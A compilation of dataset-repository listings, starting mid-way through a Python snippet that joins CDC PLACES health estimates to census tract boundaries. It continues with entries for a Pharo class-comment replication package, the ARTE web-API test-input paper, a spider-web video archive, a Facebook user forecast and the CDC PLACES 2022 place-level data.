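places_rows = [  # model-based estimates keyed by tract FIPS (made-up values)
    {"TractFIPS": "01001020100", "Measure": "BPHIGH", "Data_Value": 38.2},
    {"TractFIPS": "01001020200", "Measure": "BPHIGH", "Data_Value": 41.7},
]
boundary_rows = [  # 2015 tract boundary attribute table (geometry omitted)
    {"GEOID": "01001020100", "NAME": "Census Tract 201"},
    {"GEOID": "01001020200", "NAME": "Census Tract 202"},
]

# Index boundary records by GEOID, then attach each estimate to its tract.
by_geoid = {b["GEOID"]: b for b in boundary_rows}
joined = [
    {**by_geoid[r["TractFIPS"]], **r}
    for r in places_rows
    if r["TractFIPS"] in by_geoid
]

for row in joined:
    print(row["NAME"], row["Measure"], row["Data_Value"])
```

In a desktop GIS the same step is typically a "join by attribute" between the estimates table and the boundary layer, after which the joined measure column can be symbolized on the map.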
Attribution 4.0 (CC BY 4.0) https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
# RP Automatic-comment-generation
This folder contains all the material needed to replicate the experiments.
## Content
- [RP Automatic-comment-generation](#rp-automatic-comment-generation)
- Appendix.pdf
- [Content](#content)
- [Dataset/](#dataset)
  - [Online evaluation/](#online-evaluation)
- [Results/](#results)
  - [SI-Approach/](#si-approach)
## Dataset/
This folder contains the data for the online evaluation.
- #### Online evaluation/
  Contains the set of questions used in the online evaluation, the results of these questions, and the lists of classes used for each online evaluation.
  - [Class_understanding_questions.xlsx](RP-Automatic-comment-generation/Dataset/Online_evaluation/Class_understanding_questions.xlsx)
    Questions used to determine whether a participant understood the functionality of a class.
  - [Q_and_A_class_comment_characteristics.xlsx](RP-Automatic-comment-generation/Dataset/Online_evaluation/Q_and_A_class_comment_characteristics.xlsx)
    Questions and possible answers used to evaluate the characteristics adequacy, conciseness, and comprehensibility of a generated class comment.
  - [Q_and_A_what_participants_write_and_look_for.xlsx](RP-Automatic-comment-generation/Dataset/Online_evaluation/Q_and_A_what_participants_write_and_look_for.xlsx)
    Questions and possible answers used to determine what participants look for and write in class comments.
  - [Classes_used_in_evaluation1.xlsx](RP-Automatic-comment-generation/Dataset/Online_evaluation/Classes_used_in_evaluation1.xlsx)
    Extracted classes, with information on LOC, instance variables, number of methods, number of classes using them, and class stereotypes, for evaluation 1.
  - [Classes_used_in_evaluation2.xlsx](RP-Automatic-comment-generation/Dataset/Online_evaluation/Classes_used_in_evaluation2.xlsx)
    Extracted classes, with information on LOC, instance variables, number of methods, number of classes using them, and class stereotypes, for evaluation 2.
  - [Classes_used_in_evaluation3.xlsx](RP-Automatic-comment-generation/Dataset/Online_evaluation/Classes_used_in_evaluation3.xlsx)
    Extracted classes, with information on LOC, instance variables, number of methods, number of classes using them, and class stereotypes, for evaluation 3.
  - [Classes_used_in_evaluation4.xlsx](RP-Automatic-comment-generation/Dataset/Online_evaluation/Classes_used_in_evaluation4.xlsx)
    Extracted classes, with information on LOC, instance variables, number of methods, number of classes using them, and class stereotypes, for evaluation 4.
  - [How_often_participants_write_comments.xlsx](RP-Automatic-comment-generation/Dataset/Online_evaluation/How_often_participants_write_comments.xlsx)
    Results for the distribution of how often participants claim to write comments.
  - [How_participants_follow_class_comment_template.xlsx](RP-Automatic-comment-generation/Dataset/Online_evaluation/How_participants_follow_class_comment_template.xlsx)
    Results for the distribution of how participants follow the class comment template.
  - [What_participants_look_for_in_comments.xlsx](RP-Automatic-comment-generation/Dataset/Online_evaluation/What_participants_look_for_in_comments.xlsx)
    Evaluation results for what participants look for in class comments.
  - [What_participants_write_in_comments.xlsx](RP-Automatic-comment-generation/Dataset/Online_evaluation/What_participants_write_in_comments.xlsx)
    Evaluation results for what participants write in class comments.
## Results/
- #### SI-Approach/
  Contains all the data for the results related to the SI-Approach and the scripts used to generate that data.
  - [Class_stereotype_distribution.xlsx](RP-Automatic-comment-generation/Results/SI-Approach/Class_stereotype_distribution.xlsx)
    Extracted class stereotypes for 350 random classes in the Pharo base image. Evaluated in steps of 10 classes.
  - [Class_stereotype_script.txt](RP-Automatic-comment-generation/Results/SI-Approach/Class_stereotype_script.txt)
    Script used in the Pharo Playground to return counts of how many classes are assigned each class stereotype. Returns numbers for the class stereotypes in alphabetical order. Boundary => Small
  - [Method_stereotype_distribution.xlsx](RP-Automatic-comment-generation/Results/SI-Approach/Method_stereotype_distribution.xlsx)
    Extracted method stereotypes for 500 random classes in the Pharo base image. Evaluated in steps of 20 classes.
  - [Method_stereotype_script.txt](RP-Automatic-comment-generation/Results/SI-Approach/Method_stereotype_script.txt)
    Script used in the Pharo Playground to return counts of how many methods are assigned each method stereotype. Returns numbers for the method stereotypes in the order Accessors, Getters, Mutators, Setters, Collaborators, Controllers, Factories, and Degenerate.
Replication package of 'Can We Automatically Generate Class Comments in Pharo?'
Attribution 4.0 (CC BY 4.0) https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Testing web APIs automatically requires generating input data values such as addresses, coordinates, or country codes. Generating meaningful values for these types of parameters at random is rarely feasible, which poses a major obstacle for current test case generation approaches. In this paper, we present ARTE, the first semantic-based approach for the Automated generation of Realistic TEst inputs for web APIs. Specifically, ARTE leverages the specification of the API under test to extract semantically related values for every parameter by applying knowledge extraction techniques. Our approach has been integrated into RESTest, a state-of-the-art tool for API testing, achieving an unprecedented level of automation which allows generating up to 100% more valid API calls than existing fuzzing techniques (30% on average). Evaluation results on a set of 26 real-world APIs show that ARTE can generate realistic inputs for 7 out of every 10 parameters, outperforming the results obtained by related approaches.
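The core idea, reading parameter names from the API specification and looking each up in a knowledge base of realistic values, can be sketched as below. This is a minimal illustration, not ARTE's actual implementation; the spec fragment and the tiny in-memory knowledge base are assumptions.

```python
import json

# Toy OpenAPI-style fragment: the API under test declares its parameters.
spec = json.loads("""
{
  "paths": {
    "/hotels": {
      "get": {
        "parameters": [
          {"name": "countryCode", "in": "query"},
          {"name": "address", "in": "query"}
        ]
      }
    }
  }
}
""")

# Tiny stand-in for a knowledge base of semantically related values
# (ARTE derives such values with knowledge extraction techniques).
KNOWLEDGE = {
    "countrycode": ["US", "DE", "JP"],
    "address": ["1600 Pennsylvania Ave NW", "10 Downing St"],
}

def realistic_inputs(spec):
    """Map each declared parameter name to candidate realistic values."""
    out = {}
    for path in spec["paths"].values():
        for operation in path.values():
            for param in operation.get("parameters", []):
                out[param["name"]] = KNOWLEDGE.get(param["name"].lower(), [])
    return out

print(realistic_inputs(spec))
```

A fuzzer drawing `countryCode` from such candidates is far more likely to produce a valid API call than one drawing random strings, which is the gap the paper's 30% average improvement quantifies.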
Attribution-NonCommercial 4.0 (CC BY-NC 4.0) https://creativecommons.org/licenses/by-nc/4.0/
License information was derived automatically
This archive contains the raw video files for all webs used in publication, as well as the LEAP and DeepLabCut models, and tSNE embeddings that were the result of analyzing these videos.
The global number of Facebook users is forecast to increase continuously between 2023 and 2027 by a total of 391 million users (+14.36 percent). After a fourth consecutive year of growth, the Facebook user base is estimated to reach 3.1 billion users in 2027, a new peak. Notably, the number of Facebook users has increased continuously over the past years. User figures, shown here for the platform Facebook, have been estimated by taking into account company filings or press material, secondary research, app downloads, and traffic data. They refer to average monthly active users over the period and count multiple accounts held by one person only once. The data shown are an excerpt of Statista's Key Market Indicators (KMI). The KMI are a collection of primary and secondary indicators on the macro-economic, demographic, and technological environment in up to 150 countries and regions worldwide. All indicators are sourced from international and national statistical offices, trade associations, and the trade press, and are processed to generate comparable datasets (see supplementary notes under details for more information).
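The two figures quoted above are mutually consistent, as a quick arithmetic check shows (using only the +391 million and +14.36 percent stated in the text):

```python
# Back out the implied 2023 base from the forecast figures in the text:
# an increase of 391 million users corresponds to +14.36 percent, 2023-2027.
increase_m = 391        # million users added over 2023-2027
growth = 0.1436         # +14.36 percent

base_m = increase_m / growth    # implied 2023 user base, in millions
peak_m = base_m + increase_m    # forecast 2027 peak, in millions

print(round(base_m))   # ~2723 million
print(round(peak_m))   # ~3114 million, i.e. roughly 3.1 billion
```

The implied 2027 peak of about 3.11 billion matches the "3.1 billion users" figure in the text.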
This dataset contains model-based place (incorporated and census designated places) level estimates for the PLACES 2022 release in GIS-friendly format. PLACES covers the entire United States—50 states and the District of Columbia (DC)—at county, place, census tract, and ZIP Code Tabulation Area levels. It provides information uniformly on this large scale for local areas at 4 geographic levels. Estimates were provided by the Centers for Disease Control and Prevention (CDC), Division of Population Health, Epidemiology and Surveillance Branch. PLACES was funded by the Robert Wood Johnson Foundation in conjunction with the CDC Foundation. Data sources used to generate these model-based estimates include Behavioral Risk Factor Surveillance System (BRFSS) 2020 or 2019 data, Census Bureau 2010 population estimates, and American Community Survey (ACS) 2015–2019 estimates. The 2022 release uses 2020 BRFSS data for 25 measures and 2019 BRFSS data for 4 measures (high blood pressure, taking high blood pressure medication, high cholesterol, and cholesterol screening) that the survey collects data on every other year. These data can be joined with the 2019 Census TIGER/Line place boundary file in a GIS system to produce maps for 29 measures at the place level. An ArcGIS Online feature service is also available for users to make maps online or to add data to desktop GIS software. https://cdcarcgis.maps.arcgis.com/home/item.html?id=3b7221d4e47740cab9235b839fa55cd7